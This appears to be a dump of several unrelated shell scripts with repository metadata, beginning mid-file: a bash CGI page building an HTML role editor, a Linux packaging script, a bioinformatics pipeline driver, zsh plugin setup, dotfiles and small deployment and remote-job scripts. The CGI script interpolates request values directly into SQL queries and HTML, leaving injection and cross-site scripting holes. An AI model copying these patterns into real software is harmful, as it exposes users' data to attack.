SERVICE_NAME[$NUM]="$NAME"
done< <(echo "select service_id,name,description,use,check_command from services;"|sql_query)
while IFS="|" read NUM NAME _ ; do
ESCALATION_NAME[$NUM]=$NAME
done< <(echo "select esc_id,name from escalations;"|sql_query)
while IFS="|" read NUM NAME _ ; do
DEPENDANCY_NAME[$NUM]=$NAME
done< <(echo "select dep_id,name from deps;"|sql_query)
IFS="|" read NAME HT_ID HT_NAME SERVICES ESCALATIONS DEPS <<< "$(echo "select R.name,R.host_template,H.name,R.services,R.escalations,R.deps from role R,host_template H where R.role_id='$ROLE_ID' and R.host_template=H.host_template_id;"|sql_query)"
#$(for i in ${!SERVICE_NAME[*]} ; do echo "<option label=\"${SERVICE_NAME[$i]}\" value=\"$i\"></option>";done)
cat <<- EOF
<p id=error>$ERROR</p>
<form method=POST action=/cgi-bin/auth.cgi>
<center><b>$NAME</b></center>
<br>
<b>Host Template:</b><select name=NEW_HOST_TEMPLATE>
<option value="$HT_ID">$HT_NAME</option>
$(while IFS="|" read HTP_ID HTP_NAME ; do echo "<option value=\"$HTP_ID\">$HTP_NAME</option>" ; done< <(echo "select host_template_id,name from host_template" |sql_query))
</select>
<br><br><b>Services</b> - (The check box will remove a service)
<dir>
<table border=0 cellspacing=0 cellpadding=5>
$(a=1
for i in $SERVICES; do
[[ $a == 0 ]] && echo "<tr>"
echo "<td><input type=checkbox name=DELETE_SRV value=\"$i\" \\><a href=auth.cgi?SCR=service_edit&DO=SRV&SRV_ID=$i>${SERVICE_NAME[$i]}</a></td>"
[[ $a == 3 ]] && { echo "</tr>"; a=0; }
a=$(($a+1))
done)
</table><br>
Add a new service: <input type=text name=NEW_SRV id=NEW_SRV list="UNUSED_SERVICES">
<datalist id=UNUSED_SERVICES>
$(for i in ${!SERVICE_NAME[*]} ; do echo " <option label=\"${SERVICE_NAME[$i]}\">${SERVICE_NAME[$i]}</option>";done)
</datalist>
</dir>
<br><b>Escalations </b>
<dir>
$(for i in $ESCALATIONS; do echo " <input type=checkbox name=DELETE_ESC value=\"$i\" \\>${ESCALATION_NAME[$i]}<br>" ;done)
<b>Add a new Escalation:</b> <input type=text name=NEW_ESC id=NEW_ESC list="UNUSED_ESC">
<datalist id=UNUSED_ESC>
$(for i in ${!ESCALATION_NAME[*]} ; do echo " <option label=\"${ESCALATION_NAME[$i]}\">${ESCALATION_NAME[$i]}</option>";done)
</datalist>
</dir>
<br><b>Dependencies </b>
<dir>
$(for i in $DEPS; do echo " <input type=checkbox name=DELETE_DEP value=\"$i\" \\>${DEPENDANCY_NAME[$i]}<br>" ;done)
<b>Add a new Dependancy:</b> <input type=text name=NEW_DEP id=NEW_DEP list="UNUSED_DEP">
<datalist id=UNUSED_DEP>
$(for i in ${!DEPENDANCY_NAME[*]} ; do echo " <option label=\"${DEPENDANCY_NAME[$i]}\">${DEPENDANCY_NAME[$i]}</option>";done)
</datalist>
</dir>
<br>
<input type=hidden name=SCR value=$SCR>
<input type=hidden name=DO value=UPDATE>
<input type=hidden name=ROLE_ID value=$ROLE_ID>
<input type=submit value="Update This Role">
</form><br>
<center><b>Role Information</b></center>
servers in this role:
<table border=0 cellspacing=0 cellpadding=5 align=center>
$(a=1
while IFS="|" read SYSTEM SYSTEM_ID STATUS _ ; do
[[ $a == 0 ]] && echo "<tr>"
echo "<td align=center><a href=\"/cgi-bin/auth.cgi/?SCR=host_edit&DO=SERVER&SERVER=$SYSTEM_ID\">$SYSTEM</a>-$STATUS</td>"
[[ $a == 4 ]] && { echo "</tr>"; a=0; }
a=$(($a+1))
done< <(echo "select hostname,server_id,status from servers where role='$ROLE_ID';" |sql_query) )
</table><br>
EOF
}
| true |
5f837582ffed3f314b4f17a29c41fe33395356bc | Shell | random-mud-pie/relevanced | /scripts/packaging/make_linux_package.sh | UTF-8 | 4,391 | 3.71875 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# much of this was copied shamelessly from osquery
set -e
# SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# SOURCE_DIR="$SCRIPT_DIR/../.."
# BUILD_DIR="$SOURCE_DIR/build/linux"
# export PATH="$PATH:/usr/local/bin"
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
PROJECT_ROOT="$SCRIPT_DIR/../.."
PROJECT_BUILD_DIR="$PROJECT_ROOT/build"
BUILD_DIR="$PROJECT_BUILD_DIR/deb"
PROJECT_BIN_BUILD_DIR="$PROJECT_ROOT/build/bin"
BUILT_SERVER_BINARY="$PROJECT_BIN_BUILD_DIR/src/relevanced_static"
PACKAGE_VERSION="0.9.8"
PACKAGE_ARCH=`uname -m`
PACKAGE_ITERATION=""
PACKAGE_TYPE=""
DESCRIPTION="A server for persistent text-similarity models."
PACKAGE_NAME="relevanced"
if [[ $PACKAGE_VERSION == *"-"* ]]; then
DESCRIPTION="$DESCRIPTION (unstable/latest version)"
fi
OUTPUT_PKG_PATH="$BUILD_DIR/$PACKAGE_NAME-$PACKAGE_VERSION."
# Config files
INITD_SRC="${SCRIPT_DIR}/etc/init.d/relevanced"
INITD_DST="/etc/init.d/relevanced"
JSON_CONFIG_SRC=${SCRIPT_DIR}/etc/relevanced/relevanced.json
LOGROTATE_CONFIG_SRC=${SCRIPT_DIR}/etc/logrotate.d/relevanced
RELEVANCED_LOG_DIR="/var/log/relevanced/"
RELEVANCED_VAR_DIR="/var/lib/relevanced"
RELEVANCED_ETC_DIR="/etc/relevanced"
WORKING_DIR=/tmp/relevanced_packaging
INSTALL_PREFIX=$WORKING_DIR/prefix
function log() {
echo "[+] $1"
}
function fatal() {
echo "[!] $1"
exit 1
}
function usage() {
fatal "Usage: $0 -t deb|rpm -i REVISION -d DEPENDENCY_LIST"
}
function parse_args() {
while [ "$1" != "" ]; do
case $1 in
-t | --type ) shift
PACKAGE_TYPE=$1
;;
-i | --iteration ) shift
PACKAGE_ITERATION=$1
;;
-d | --dependencies ) shift
PACKAGE_DEPENDENCIES="${@}"
;;
-h | --help ) usage
;;
esac
shift
done
}
function check_parsed_args() {
if [[ $PACKAGE_TYPE = "" ]] || [[ $PACKAGE_ITERATION = "" ]]; then
usage
fi
OUTPUT_PKG_PATH=$OUTPUT_PKG_PATH$PACKAGE_TYPE
}
function main() {
parse_args $@
check_parsed_args
rm -rf $WORKING_DIR
rm -f $OUTPUT_PKG_PATH
mkdir -p $INSTALL_PREFIX
rm -rf $INSTALL_PREFIX/*
mkdir -p $BUILD_DIR
log "copying binaries"
BINARY_INSTALL_DIR="$INSTALL_PREFIX/usr/bin/"
mkdir -p $BINARY_INSTALL_DIR
cp $BUILT_SERVER_BINARY $BINARY_INSTALL_DIR/relevanced
chmod g-w $BINARY_INSTALL_DIR/relevanced
strip $BINARY_INSTALL_DIR/*
# Create the prefix log dir and copy source configs
log "copying configurations"
mkdir -p $INSTALL_PREFIX/$RELEVANCED_VAR_DIR/data
mkdir -p $INSTALL_PREFIX/$RELEVANCED_LOG_DIR
mkdir -p $INSTALL_PREFIX/$RELEVANCED_ETC_DIR
mkdir -p $INSTALL_PREFIX/etc/logrotate.d
mkdir -p `dirname $INSTALL_PREFIX$INITD_DST`
cp $JSON_CONFIG_SRC $INSTALL_PREFIX/$RELEVANCED_ETC_DIR/relevanced.json
cp $INITD_SRC $INSTALL_PREFIX$INITD_DST
chmod g-w $INSTALL_PREFIX$INITD_DST
chmod a+x $INSTALL_PREFIX$INITD_DST
LOGROTATE_DEST=$INSTALL_PREFIX/etc/logrotate.d/relevanced
cp $LOGROTATE_CONFIG_SRC $LOGROTATE_DEST
chmod 644 $LOGROTATE_DEST
log "creating package"
IFS=',' read -a deps <<< "$PACKAGE_DEPENDENCIES"
PACKAGE_DEPENDENCIES=
for element in "${deps[@]}"
do
element=`echo $element | sed 's/ *$//'`
PACKAGE_DEPENDENCIES="$PACKAGE_DEPENDENCIES -d \"$element\""
done
OS="ubuntu"
DISTRO="trusty"
FPM="fpm"
CMD="$FPM -s dir -t $PACKAGE_TYPE \
-n $PACKAGE_NAME -v $PACKAGE_VERSION \
--iteration $PACKAGE_ITERATION \
-a $PACKAGE_ARCH \
$PACKAGE_DEPENDENCIES \
-p $OUTPUT_PKG_PATH \
--config-files etc/relevanced/relevanced.json \
--config-files etc/init.d/relevanced \
--config-files etc/logrotate.d/relevanced \
--before-install ${SCRIPT_DIR}/deb/preinst \
--after-install ${SCRIPT_DIR}/deb/postinst \
--before-remove ${SCRIPT_DIR}/deb/prerm \
--after-remove ${SCRIPT_DIR}/deb/postrm \
--url http://www.relevanced.org \
-m scott.ivey@gmail.com \
--license MIT \
--description \"$DESCRIPTION\" \
\"$INSTALL_PREFIX/=/\""
echo "running: $CMD"
eval "$CMD"
log "package created at $OUTPUT_PKG_PATH"
}
main $@
| true |
b6c76e88710392ae7f593f526ff8ca907ea0438a | Shell | altingia/LIONS | /lions.sh | UTF-8 | 4,742 | 3.75 | 4 | [] | no_license | #!/bin/bash
# Usage: .lions.sh <parameter.ctrl (opt.)>
set -e
# ===================================================================
# LIONS analysis pipeline
# ===================================================================
#
# Analyze an input .bam RNAseq file for transcripts which initiate in
# transposable elements and create an annotation file. Compare TE
# files between biological groups.
#
# Details can be found in README
#
echo ''
echo ''
echo '==============================================================='
echo '========================= L I O N S ==========================='
echo '==============================================================='
echo ''' _ _
_/ \|/ \_
/\\/ \//\
\|/<\ />\|/ *RAWR*
/\ _ /\ /
\|/\ Y /\|/
\/|v-v|\/
\/\_/\/
'''
echo ''
# INITIALIZATION ===================================================
# Start-up script which checks all requisites are operational for
# LIONS to run. Also initializes the project space
# *** WRITE LAST ***
# Read parameter file (imports run parameters)
if [ -z $1 ]
then
echo " No parameter input file specified. Importing default file:"
echo " ./LIONS/controls/parameter.ctrl"
export PARAMETER="controls/parameter.ctrl"
echo ''
else
echo " Import parameter file."
echo " Project Parameters: ./$1"
export PARAMETER=$1
echo ''
fi
# Run parameter script
source $PARAMETER # works in bash only
# Run Initialization Script
echo ' running initializeLIONS.sh'
bash $SCRIPTS/Initialize/initializeLIONS.sh
echo ' initialization completed successfully.'
echo ''
# EAST LION =========================================================
echo ''
echo ' E A S T L I O N '
echo ''
echo ' ./LIONS/scripts/eastLion.sh '
echo '==============================================================='
echo ' Align reads to genome and perform TE-initiation analysis'
echo ''
cd $pDIR #./LIONS/projects/<projectName>
# Initialize Summit Log file
touch summitLog_$RUNID
# Loop through each library in input file
iterN=$(wc -l $INPUT_LIST | cut -f1 -d' ' -)
for nLib in $(seq $iterN)
do
# Extract row of entries from input list
rowN=$(sed -n "$nLib"p $INPUT_LIST)
# Library Name
libName=$(echo $rowN | cut -f1 -d' ')
echo " Iteration $nLib: $libName ------------------------------------------"
echo " run: $QSUB eastLion.sh $libName"
if [ ! -e $pDIR/$libName/$libName.lions ]
then
# Lions output for this library doesn't exist
# so let's make it.
if [ $CLUSTER == '1' ]
then # Cluster QSUB
$QSUB $SCRIPTS/eastLion.sh $libName
else # Local (no) QSUB
$SCRIPTS/eastLion.sh $libName
fi
elif [ $SORTBYPASS = '0' ]
then
# Lions output already exists but
# East Lion bypass is set to false, re-calculate lions file
# so let's make it.
if [ $CLUSTER == '1' ]
then # Cluster QSUB
$QSUB $SCRIPTS/eastLion.sh $libName
else # Local (no) QSUB
$SCRIPTS/eastLion.sh $libName
fi
else
# East Lion file already exists and bypass is true (1)
# Skip the east lion
echo " East Lions has previously been completed. "
lionSuccess='1'
echo $libName $lionSuccess $(date) >> $pDIR/summitLog_$RUNID
fi
echo " ... run complete -------------------------------------------"
echo ''
echo ''
done
# Check that all libraries have completed
#iterN is the number of libraries
summitN=$(wc -l $pDIR/summitLog_$RUNID | cut -f1 -d' ' )
while [ $summitN -lt $iterN ] # Not all EAST LION iterations have completed
do
# Verbose
echo " $summitN / $iterN East Lion scripts completed. Waiting..."
date
# Wait 10 minutes
sleep 600s # Actual
# Recalculate summitN
summitN=$(wc -l $pDIR/summitLog_$RUNID | cut -f1 -d' ')
done
# All runs completed
# Check if they are each succesful
for Log in $(cut -f2 $pDIR/summitLog_$RUNID)
do
if [ $Log = '0' ];
then
echo " ERROR 15: One of the East Lion Libraries didn't finish."
exit 15
fi
done
# Clear summit log
rm $pDIR/summitLog_$RUNID
echo ''
echo ' All EAST LION scripts have completed. '
# WEST LION =========================================================
echo ''
echo ' W E S T L I O N '
echo ''
echo ' ./LIONS/scripts/westLion.sh '
echo '==============================================================='
echo ' Group and analyze lions files of TE-initiation events'
echo ''
cd $pDIR #./LIONS/projects/<projectName>
# Run West Lions Script
echo ' run: westLion.sh'
bash $SCRIPTS/westLion.sh
echo ''
echo ' WEST LION scripts have completed. '
| true |
6c51137204c3b915a9d95111949b79f5976af3d0 | Shell | Rean1030/docker4wordpress | /start.sh | UTF-8 | 929 | 3.328125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -o errexit
# shellcheck source=.env
source .env
if [ ! -f certs/nginx.key ] || [ ! -f certs/nginx.crt ]; then
if [ ! -f mkcert ]; then
curl -L https://github.com/FiloSottile/mkcert/releases/download/v1.4.3/mkcert-v1.4.3-linux-amd64 -o mkcert
fi
chmod +x mkcert
./mkcert -install
./mkcert -key-file nginx.key -cert-file nginx.crt ${SERVER_NAME}
mv nginx.key nginx.crt certs/;
fi
WORKER_PROCESSES=$(grep processor /proc/cpuinfo | wc -l)
SYS_FMLMT=$(cat /proc/sys/fs/file-max)
USR_FMLMT=$(ulimit -n)
# Get the min num of system and user file open limit
[ $SYS_FMLMT -lt $USR_FMLMT ] && WORKER_CONNECTIONS=$SYS_FMLMT || WORKER_CONNECTIONS=$USR_FMLMT
ENV_CONFIG=".env"
[ ! -z "${WORKER_PROCESSES}" ] && sed -i "s/!WORKER_PROCESSES!/${WORKER_PROCESSES}/" $ENV_CONFIG
[ ! -z "${WORKER_CONNECTIONS}" ] && sed -i "s/!WORKER_CONNECTIONS!/${WORKER_CONNECTIONS}/" $ENV_CONFIG
docker-compose up -d | true |
e2b688232a2a84074131520bc6ffe1dca2baba9e | Shell | cbancroft/config | /zsh/zshplugins.zsh | UTF-8 | 7,707 | 3.484375 | 3 | [] | no_license | #!/usr/bin/env zsh
# Clone zgenom if you haven't already
if [[ -z "$ZGENOM_PARENT_DIR" ]]; then
ZGENOM_PARENT_DIR=$HOME
ZGENOM_SOURCE_FILE=$ZGENOM_PARENT_DIR/.zqs-zgenom/zgenom.zsh
# Set ZGENOM_SOURCE_FILE to the old directory if it already exists
if [[ -f "$ZGENOM_PARENT_DIR/zgenom/zgenom.zsh" ]]; then
ZGENOM_SOURCE_FILE=$ZGENOM_PARENT_DIR/zgenom/zgenom.zsh
fi
fi
# zgenom stores the clones plugins & themes in $ZGEN_DIR when it
# is set. Otherwise it stuffs everything in the source tree, which
# is unclean.
ZGEN_DIR=${ZGEN_DIR:-$HOME/.zgenom}
if [[ ! -f "$ZGENOM_SOURCE_FILE" ]]; then
if [[ ! -d "$ZGENOM_PARENT_DIR" ]]; then
mkdir -p "$ZGENOM_PARENT_DIR"
fi
pushd $ZGENOM_PARENT_DIR
git clone https://github.com/jandamm/zgenom.git .zqs-zgenom
popd
fi
if [[ ! -f "$ZGENOM_SOURCE_FILE" ]]; then
echo "Can't find zgenom.zsh"
else
# echo "Loading zgenom"
source "$ZGENOM_SOURCE_FILE"
fi
unset ZGENOM_PARENT_DIR ZGENOM_SOURCE_FILE
load-starter-plugin-list() {
echo "Creating a zgenom save"
ZGEN_LOADED=()
ZGEN_COMPLETIONS=()
if [[ ! -f ~/.zsh-quickstart-no-omz ]]; then
zgenom oh-my-zsh
fi
# If you want to customize your plugin list, create a file named
# .zsh-quickstart-local-plugins-example in your home directory. That
# file will be sourced during startup *instead* of running this
# load-starter-plugin-list function, so make sure to include everything
# from this function that you want to keep.
#
# To make customizing easier, there's a .zsh-quickstart-local-plugins-example
# file at the top level of the zsh-quickstart-kit repository that you can
# copy as a starting point. This keeps you from having to maintain a fork of
# the quickstart kit.
# If zsh-syntax-highlighting is bundled after zsh-history-substring-search,
# they break, so get the order right.
zgenom load zsh-users/zsh-syntax-highlighting
zgenom load zsh-users/zsh-history-substring-search
# Set keystrokes for substring searching
zmodload zsh/terminfo
bindkey "$terminfo[kcuu1]" history-substring-search-up
bindkey "$terminfo[kcud1]" history-substring-search-down
# Automatically run zgenom update and zgenom selfupdate every 7 days.
zgenom load unixorn/autoupdate-zgenom
# Colorize the things if you have grc installed. Well, some of the
# things, anyway.
zgenom load unixorn/warhol.plugin.zsh
# Warn you when you run a command that you've set an alias for without
# using the alias.
zgenom load djui/alias-tips
# Add my collection of git helper scripts.
zgenom load unixorn/git-extra-commands
# Supercharge your history search with fzf
zgenom load unixorn/fzf-zsh-plugin
# A collection of scripts that might be useful to sysadmins.
zgenom load skx/sysadmin-util
# Adds aliases to open your current repo & branch on github.
zgenom load peterhurford/git-it-on.zsh
# Load some oh-my-zsh plugins
zgenom oh-my-zsh plugins/pip
zgenom oh-my-zsh plugins/sudo
zgenom oh-my-zsh plugins/aws
zgenom oh-my-zsh plugins/chruby
zgenom oh-my-zsh plugins/colored-man-pages
zgenom oh-my-zsh plugins/git
zgenom oh-my-zsh plugins/github
zgenom oh-my-zsh plugins/python
zgenom oh-my-zsh plugins/rsync
zgenom oh-my-zsh plugins/screen
zgenom oh-my-zsh plugins/vagrant
zgenom load chrissicool/zsh-256color
# Load more completion files for zsh from the zsh-lovers github repo.
zgenom load zsh-users/zsh-completions src
# Docker completion
zgenom load srijanshetty/docker-zsh
# Load me last
GENCOMPL_FPATH=$HOME/.zsh/complete
# Very cool plugin that generates zsh completion functions for commands
# if they have getopt-style help text. It doesn't generate them on the fly,
# you'll have to explicitly generate a completion, but it's still quite cool.
zgenom load RobSis/zsh-completion-generator
# Add Fish-like autosuggestions to your ZSH.
zgenom load zsh-users/zsh-autosuggestions
# k is a zsh script / plugin to make directory listings more readable,
# adding a bit of color and some git status information on files and
# directories.
zgenom load supercrabtree/k
# p10k is faster and what I'm using now, so it is the new default
zgenom load romkatv/powerlevel10k powerlevel10k
# Save it all to init script.
zgenom save
}
setup-zgen-repos() {
ZQS_override_plugin_list=''
# If they have both, the new name takes precedence
if [[ -r $HOME/.zsh-quickstart-local-plugins ]]; then
ZQS_override_plugin_list="$HOME/.zsh-quickstart-local-plugins"
fi
if [[ -r "$ZQS_override_plugin_list" ]]; then
echo "Loading local plugin list from $ZQS_override_plugin_list"
source "$ZQS_override_plugin_list"
unset ZQS_override_plugin_list
else
load-starter-plugin-list
fi
}
# This comes from https://stackoverflow.com/questions/17878684/best-way-to-get-file-modified-time-in-seconds
# This works on both Linux with GNU fileutils and macOS with BSD stat.
# Naturally BSD/macOS and Linux can't share the same options to stat.
if [[ $(uname | grep -ci -e Darwin -e BSD) = 1 ]]; then
# macOS version.
get_file_modification_time() {
modified_time=$(stat -f %m "$1" 2>/dev/null) || modified_time=0
echo "${modified_time}"
}
elif [[ $(uname | grep -ci Linux) = 1 ]]; then
# Linux version.
get_file_modification_time() {
modified_time=$(stat -c %Y "$1" 2>/dev/null) || modified_time=0
echo "${modified_time}"
}
fi
# check if there's an init.zsh file for zgen and generate one if not.
if ! zgen saved; then
setup-zgen-repos
fi
# Our installation instructions get the user to make a symlink
# from ~/.zgen-setup to wherever they checked out the zsh-quickstart-kit
# repository.
#
# Unfortunately, stat will return the modification time of the
# symlink instead of the target file, so construct a full path to hand off
# to stat so it returns the modification time of the actual .zgen-setup file.
if [[ -f ~/.zgen-setup ]]; then
REAL_ZGEN_SETUP=~/.zgen-setup
fi
if [[ -L ~/.zgen-setup ]]; then
REAL_ZGEN_SETUP="$(readlink ~/.zgen-setup)"
fi
# If you don't want my standard starter set of plugins, create a file named
# .zsh-quickstart-local-plugins and add your zgenom load commands there. Don't forget to
# run `zgenom save` at the end of your .zsh-quickstart-local-plugins file.
#
# Warning: .zgen-local-plugins REPLACES the starter list setup, it doesn't
# add to it.
#
# Use readlink in case the user is symlinking from another repo checkout, so
# they can use a personal dotfiles repository cleanly.
if [[ -f ~/.zgen-local-plugins ]]; then
REAL_ZGEN_SETUP=~/.zgen-local-plugins
fi
if [[ -L ~/.zgen-local-plugins ]]; then
REAL_ZGEN_SETUP="${HOME}/$(readlink ~/.zgen-local-plugins)"
fi
# Old file still works for backward compatibility, but we want the new file
# to take precedence when both exist.
if [[ -f ~/.zsh-quickstart-local-plugins ]]; then
REAL_ZGEN_SETUP=~/.zsh-quickstart-local-plugins
fi
if [[ -L ~/.zsh-quickstart-local-plugins ]]; then
REAL_ZGEN_SETUP="${HOME}/$(readlink ~/.zsh-quickstart-local-plugins)"
fi
# echo "REAL_ZGEN_ZETUP: $REAL_ZGEN_SETUP"
# If .zgen-setup is newer than init.zsh, regenerate init.zsh
if [ $(get_file_modification_time ${REAL_ZGEN_SETUP}) -gt $(get_file_modification_time ~/.zgenom/init.zsh) ]; then
echo "$(basename ${REAL_ZGEN_SETUP}) ($REAL_ZGEN_SETUP) updated; creating a new init.zsh from plugin list in ${REAL_ZGEN_SETUP}"
setup-zgen-repos
fi
unset REAL_ZGEN_SETUP
| true |
258fda0a4f97d348769ecd4cebc91f25b336e65e | Shell | novanfatk/kemampuan-dasar | /kemampuan-dasar1/latihan/shellscripts/multiline-comment.sh | UTF-8 | 190 | 2.78125 | 3 | [] | no_license | tea@novan:~$ nano multiline-comment.sh
#!/bin/bash
: '
The following script calculates
the square value of the number, 5.
'
((area=5*5))
echo $area
tea@novan:~$ bash multiline-comment.sh
25 | true |
fe264d622a44ed7d05f104ec275cf1016bf1d63c | Shell | ptisserand/minecraft-server-setup | /doit/minecraft_world_backup.bash | UTF-8 | 549 | 3.828125 | 4 | [] | no_license | #!/bin/bash -e
source $(dirname $(readlink -f ${0}))/common
SERVER="${DO_HOSTNAME}.${DO_DOMAIN}"
USER="root"
MINECRAFT_DATA_DIR="/home/minecraft/server/data"
##########################################
# Backup world
minecraft_world_backup() {
local output=${1}
echo "Backup minecraft world into ${output}"
ssh_cmd ${USER} ${SERVER} "cd ${MINECRAFT_DATA_DIR} && tar czpf - world" > ${output}
tar tzpf ${output} >> /dev/null
}
if test $# -ne 1; then
echo "${0} require 1 argument"
exit 1
fi
minecraft_world_backup ${1}
| true |
641f7974b0e15e1cc3b25e5471d72cee29bd05a0 | Shell | newsdev/int-newsapps-template | /scripts/_dashboard.sh | UTF-8 | 176 | 2.5625 | 3 | [] | no_license | #!/bin/bash
function show_dashboard {
printf "Type: ${WARN} $TYPE ${BASE}\n"
printf "Name: ${WARN} $NAME ${BASE}\n"
printf "Log: ${WARN} $LOGFILE_PATH ${BASE}\n"
} | true |
72c2b90783d33ae6e1409b90bd5aa43d8268ed95 | Shell | romabash/bashing-bash | /Terminal-tput/1.1_tput.sh | UTF-8 | 1,345 | 3.5625 | 4 | [] | no_license | #!/bin/bash
#--------------------------------------
# tput
# Displaying a message in the middle of the terminal
#--------------------------------------
#--------------------------------------
# Get number of columns in current terminal with "tput cols"
# Get number of rows in current terminal with "tput lines"
#--------------------------------------
cols=$(tput cols) #how many columns terminal has
rows=$(tput lines) #how many lines/rows terminal has
#--------------------------------------
# Display message in the middle of the terminal
#--------------------------------------
#Message to display
message="$cols Columns by $rows Rows"
#find the length of the message
input_length=${#message}
#To center, get half of length
half_input_length=$(( $input_length / 2 ))
#Get middle of row (height)
middle_row=$(( $rows / 2))
#get get middle of width minus half of the length (each side)
middle_col=$(( ($cols / 2) - $half_input_length ))
#clear terminal
tput clear
#put "cursor" at given location
tput cup $middle_row $middle_col
#Make text bold
tput bold
#Echo the message
echo $message
#Turns bold and other changes off
tput sgr0
#Place the prompt at the bottom of the screen after 2 seconds
sleep 2
tput cup $( tput lines ) 0
#--------------------------------------
# End
#--------------------------------------
| true |
0a1a8d2aff6e44ec361919a3f98ee6c20832804b | Shell | kainabels/dotfiles | /bash/bash_profile | UTF-8 | 170 | 2.78125 | 3 | [] | no_license | #!/bin/sh
# vim: ft=sh
if [ -f ~/.bashrc ];then
source ~/.bashrc
fi
PATH=/usr/local/bin:$PATH
export PATH
if which rbenv >/dev/null; then
eval "$(rbenv init -)"
fi
| true |
2fff387c1a728774c3ad3fdb582a87ebe34ec48d | Shell | vbhavsar/dotfiles | /.profile | UTF-8 | 2,203 | 3.125 | 3 | [] | no_license |
if [[ "$SHELL" == "/bin/bash" ]]; then
unalias -a
elif [[ "$SHELL" == "/bin/zsh" ]]; then
unalias -m "*"
fi
set -o vi
export H=$HOME
if [[ -e "$HOME/sw/maven" ]]; then
export M2_HOME=$HOME/sw/maven
export PATH=$PATH:$M2_HOME/bin
fi
if [[ -d "/home/ec2-user/bin/jdk1.7.0" ]]; then
export JAVA_HOME=/home/ec2-user/bin/jdk1.7.0
export PATH=$PATH:$JAVA_HOME/bin
fi
if [[ -d /home/ec2-user/sw/go/bin ]] ; then
export PATH=$PATH:/home/ec2-user/sw/go/bin
fi
alias h='cd ~'
alias cls=clear
alias vi='vim'
alias ls='ls -G'
alias l='ls -ltr'
alias ll='ls -l'
alias la='ls -a'
alias clsl='cls;l'
alias clls='clsl'
alias clll='cls;ll'
alias clsll='cls;ll'
alias clsls='cls;ls'
alias s="cd ${H}/scripts"
alias src="cd ${H}/src"
alias repo="cd ${H}/repo"
alias bin="cd ${H}/bin"
alias u="cd ${H}/util"
alias grep='grep --color'
alias via='vi ~/.profile; apply'
alias apply='. ~/.profile; echo \\o/'
alias virc='vi ~/.vimrc'
alias tmp='cd ~/tmp'
alias sw='cd ~/sw'
alias www='cd /var/www'
alias wlog='cd /var/log'
alias log='cd /var/log'
alias conf='cd /etc/lighttpd/'
alias ..='cd ..'
alias ...='cd ../..'
alias ....='cd ../../..'
alias sls='screen -ls'
alias sR='screen -R'
alias visc='vi ~/.screenrc'
alias tls='tmux ls'
alias ta='tmux attach -t'
alias vit='vi ~/.tmux.conf'
alias t0='tail -q -n0 -F'
alias lp="_lp"
alias 3d='cal -3'
alias y='cal -y'
alias md='/home/ec2-user/sw/Markdown_1.0.1/Markdown.pl'
alias push_to_gh="git push origin master"
########################
# Functions
########################
function _lp(){
if [[ -z $1 ]]; then
command lp
else
c1=$(echo "$1" | cut -c1)
if [[ $c1 == "/" ]]; then
echo $1
else
fp="$(pwd)/$1"
if [[ ! -f $fp ]]; then
echo "no such file exists"
else
echo $fp
fi
fi
fi
}
alias gs='git status'
alias gd='git diff'
alias gb='git branch'
alias gc='git checkout'
alias pallete='for i in {0..255} ; do printf "\x1b[38;5;${i}mcolour${i}\n"; done'
alias viz='vi ~/.zshrc'
alias senv="echo \"set -o vi; alias cls='clear'; alias l='ls -ltr'; alias clsl='cls;l'; alias t0='tail -F -n0 -q'; \""
| true |
d367844eb38339737283d09a92a16197809fc176 | Shell | programster/swagger-ui | /docker/deploy.sh | UTF-8 | 511 | 3.515625 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
if ! [ -n "$BASH_VERSION" ];then
echo "this is not bash, calling self with bash....";
SCRIPT=$(readlink -f "$0")
/bin/bash $SCRIPT
exit;
fi
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# create the volume folder if it doesn't already exist.
mkdir -p $HOME/spec
# remove the existing container if it is already running.
docker kill swagger-ui
docker rm swagger-ui
docker run \
-d \
-p 80:8080 \
--name swagger-ui \
--volume $HOME/spec:/build/dist/spec \
swagger-ui-image
| true |
6e238ccd424249391151663892f23d04d51421e4 | Shell | RyanLuu/emsuite_web | /scripts/mainmast.sh | UTF-8 | 1,825 | 3.21875 | 3 | [] | no_license | #!/bin/bash
TRIM_ID=$(echo "$1" | tr -cd [:alnum:])
sql_update_start="UPDATE mainmast SET status=2 WHERE id=\"$TRIM_ID\""
sqlite3 db.sqlite3 "$sql_update_start"
USER="rluu"
REMOTE="brown.rcac.purdue.edu"
IDENTITY="~/.ssh/id_rsa"
WD="/home/rluu/mainmast"
remote_cp_tx() {
scp -i $IDENTITY $1 $USER@$REMOTE:$WD/$2
}
remote_cp_rx() {
scp -i $IDENTITY $USER@$REMOTE:$WD/$1 $2
}
remote_sh() {
ssh -i $IDENTITY $USER@$REMOTE "cd $WD; $1"
}
sql="SELECT map_file,gw,t,allow,filter,merge,Rlocal,Nround,Nnb,Ntb,Dkeep,Const FROM mainmast WHERE id=\"$TRIM_ID\""
params=$(sqlite3 db.sqlite3 "$sql")
mapfile=$(echo $params | awk -F '|' '{print "media/" $1}')
bn=$(basename -- "$mapfile")
ext="${bn##*.}"
filename=$1.$ext
gw=$(echo $params | awk -F '|' '{printf "%g", $2}')
t=$(echo $params | awk -F '|' '{print $3}')
allow=$(echo $params | awk -F '|' '{print $4}')
filter=$(echo $params | awk -F '|' '{print $5}')
merge=$(echo $params | awk -F '|' '{print $6}')
Rlocal=$(echo $params | awk -F '|' '{print $7}')
Nround=$(echo $params | awk -F '|' '{print $8}')
Nnb=$(echo $params | awk -F '|' '{print $9}')
Ntb=$(echo $params | awk -F '|' '{print $10}')
Dkeep=$(echo $params | awk -F '|' '{print $11}')
Const=$(echo $params | awk -F '|' '{print $12}')
remote_cp_tx $mapfile input/$filename
run_command="./run.sh input/$filename output/$1.pdb -gw $gw -t $t -allow $allow -filter $filter -merge $merge -Rlocal $Rlocal -Nround $Nround -Nnb $Nnb -Ntb $Ntb -Dkeep $Dkeep -Const $Const"
echo $run_command
remote_sh "$run_command"
remote_cp_rx output/$1.pdb media/mainmast/output/$1.pdb
if [ -f "media/mainmast/output/$1.pdb" ]; then
sql_update_end="UPDATE mainmast SET status=3 WHERE id=\"$TRIM_ID\""
else
sql_update_end="UPDATE mainmast SET status=4 WHERE id=\"$TRIM_ID\""
fi
sqlite3 db.sqlite3 "$sql_update_end"
| true |
